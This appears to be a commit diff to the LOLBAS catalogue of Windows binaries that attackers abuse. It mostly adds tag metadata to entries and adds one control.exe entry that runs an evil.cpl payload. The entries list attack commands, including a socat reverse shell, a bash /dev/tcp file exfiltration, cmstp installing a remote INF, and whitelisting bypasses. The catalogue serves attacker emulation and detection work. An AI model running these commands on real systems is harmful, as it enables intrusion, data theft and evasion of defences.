Applying update LOLBAS-Project/LOLBAS@b9a6cd6

Author: github-actions[bot]

_lolbas/Binaries/Addinutil.md

@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: .NetObjects
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

_lolbas/Binaries/At.md

@@ -11,6 +11,8 @@ Commands:
     Privileges: Local Admin
     MitreID: T1053.002
     OperatingSystem: Windows 7 or older
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\WINDOWS\System32\At.exe
   - Path: C:\WINDOWS\SysWOW64\At.exe

_lolbas/Binaries/Atbroker.md

@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\System32\Atbroker.exe
   - Path: C:\Windows\SysWOW64\Atbroker.exe

_lolbas/Binaries/Bash.md

@@ -11,27 +11,35 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
     Description: Executes a reverseshell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\Windows\System32\bash.exe
   - Path: C:\Windows\SysWOW64\bash.exe

_lolbas/Binaries/Cmstp.md

@@ -12,7 +12,7 @@ Commands:
     MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Input: INF
+      - Execute: INF
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -21,7 +21,8 @@ Commands:
     MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
     Tags:
-      - Input: INF
+      - Execute: INF
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\System32\cmstp.exe
   - Path: C:\Windows\SysWOW64\cmstp.exe

_lolbas/Binaries/Conhost.md

@@ -11,13 +11,17 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
   - Command: "conhost.exe --headless calc.exe"
     Description: Execute calc.exe with conhost.exe as parent process
     Usecase: Specify --headless parameter to hide child process window (if applicable)
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: c:\windows\system32\conhost.exe
 Detection:

_lolbas/Binaries/Control.md

@@ -13,6 +13,15 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Execute: DLL
+  - Command: control.exe c:\windows\tasks\evil.cpl
+    Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
+    Usecase: Use to execute code and bypass application whitelisting
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.002
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: DLL
 Full_Path:
   - Path: C:\Windows\System32\control.exe
   - Path: C:\Windows\SysWOW64\control.exe

_lolbas/Binaries/CustomShellHost.md

@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
 Full_Path:
   - Path: C:\Windows\System32\CustomShellHost.exe
 Detection:

_lolbas/Binaries/Dfsvc.md

@@ -11,6 +11,9 @@ Commands:
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: ClickOnce
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

_lolbas/Binaries/Diskshadow.md

@@ -11,13 +11,17 @@ Commands:
     Privileges: User
     MitreID: T1003.003
     OperatingSystem: Windows server
+    Tags:
+      - Execute: CMD
   - Command: diskshadow> exec calc.exe
     Description: Execute commands using diskshadow.exe to spawn child process
     Usecase: Use diskshadow to bypass defensive counter measures
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows server
+    Tags:
+      - Execute: CMD
 Full_Path:
   - Path: C:\Windows\System32\diskshadow.exe
   - Path: C:\Windows\SysWOW64\diskshadow.exe